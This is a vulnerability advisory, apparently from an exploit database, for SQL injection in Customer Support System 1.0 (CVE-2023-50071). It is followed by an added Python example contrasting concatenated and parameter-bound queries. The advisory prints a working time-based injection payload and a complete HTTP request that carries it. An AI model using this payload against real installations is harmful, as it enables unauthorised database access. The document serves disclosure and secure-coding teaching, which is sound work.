# Exploit Title: Customer Support System 1.0 - Multiple SQL Injection Vulnerabilities
# Date: 15/12/2023
# Exploit Author: Geraldo Alcantara
# Vendor Homepage:
# Software Link:
# Version: 1.0
# Tested on: Windows
# CVE : CVE-2023-50071
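Description: Multiple SQL injection vulnerabilities in
/customer_support/ajax.php?action=save_ticket in Customer Support
System 1.0 allow authenticated attackers to execute arbitrary SQL
via department_id, customer_id, and subject. Payload:
'+(select*from(select(sleep(20)))a)+'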
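Steps to reproduce:
1 - Log in to the application.
2 - Navigate to the page /customer_support/index.php?page=new_ticket.
3 - Create a new ticket and insert the malicious payload into one of
the following parameters: department_id, customer_id, or subject.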
Request:
POST /customer_support/ajax.php?action=save_ticket HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: */*
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------81419250823333111111193422505835
Content-Length: 853
Origin: http://192.168.68.148
Connection: close
Referer: http://192.168.68.148/customer_support/index.php?page=new_ticket
Cookie: csrftoken=1HWW6JE5VLFHJV2Y8LWGL3WNPBPJ3J2WAX9F2U0F25H5H5T6DSZTKJWD4NWFRBF8KO; sessionId=xrn1sshbol1vipddxsijmgkdp2q4qdgq; PHPSESSID=MFD30TU0H0S43S7KDJB74FCU0L

-----------------------------81419250823333111111193422505835
Content-Disposition: form-data; name="id"


-----------------------------81419250823333111111193422505835
Content-Disposition: form-data; name="subject"

teste'+(select*from(select(sleep(5)))a)+'
-----------------------------81419250823333111111193422505835
Content-Disposition: form-data; name="customer_id"

3
-----------------------------81419250823333111111193422505835
Content-Disposition: form-data; name="department_id"

4
-----------------------------81419250823333111111193422505835
Content-Disposition: form-data; name="description"

<p>blahs<br></p>
-----------------------------81419250823333111111193422505835
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream


-----------------------------81419250823333111111193422505835--
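
Added example, not part of the original advisory and not the application's own code: it shows why the subject payload above executes when request values are concatenated into the SQL text, and why it is stored as inert data when values are bound. Assumptions: an in-memory SQLite database stands in for the application's MySQL backend, the tickets table and both save_ticket_* functions are hypothetical, and sleep() is a stub that records the call instead of delaying.

```python
import sqlite3

# Subject value taken from the request above.
PAYLOAD = "teste'+(select*from(select(sleep(5)))a)+'"

def make_db():
    """In-memory DB with a hypothetical tickets table and a stub sleep()."""
    conn = sqlite3.connect(":memory:")
    calls = []
    # SQLite has no SLEEP(); this stub records the argument and returns 0.
    conn.create_function("sleep", 1, lambda secs: calls.append(secs) or 0)
    conn.execute(
        "CREATE TABLE tickets (subject TEXT, customer_id INTEGER, department_id INTEGER)"
    )
    return conn, calls

def save_ticket_concat(conn, subject, customer_id, department_id):
    """Vulnerable pattern: request values are pasted into the SQL text."""
    conn.execute(
        "INSERT INTO tickets (subject, customer_id, department_id) "
        f"VALUES ('{subject}', {customer_id}, {department_id})"
    )

def save_ticket_bound(conn, subject, customer_id, department_id):
    """Hardened pattern: IDs must parse as integers, all values are bound."""
    ids = (int(customer_id), int(department_id))  # ValueError on non-numeric input
    conn.execute(
        "INSERT INTO tickets (subject, customer_id, department_id) VALUES (?, ?, ?)",
        (subject, *ids),
    )

def run(save, subject=PAYLOAD, customer_id="3", department_id="4"):
    """Save one ticket with `save`; return (sleep_calls, stored_subject)."""
    conn, calls = make_db()
    save(conn, subject, customer_id, department_id)
    stored = conn.execute("SELECT subject FROM tickets").fetchone()[0]
    return calls, stored

if __name__ == "__main__":
    print("concatenated:", run(save_ticket_concat))
    print("bound:       ", run(save_ticket_bound))
```

With concatenation the stub sleep() is invoked and the stored subject is no longer the submitted text; with bound parameters sleep() is never called and the subject is stored verbatim, while a non-numeric customer_id or department_id is rejected before any SQL runs.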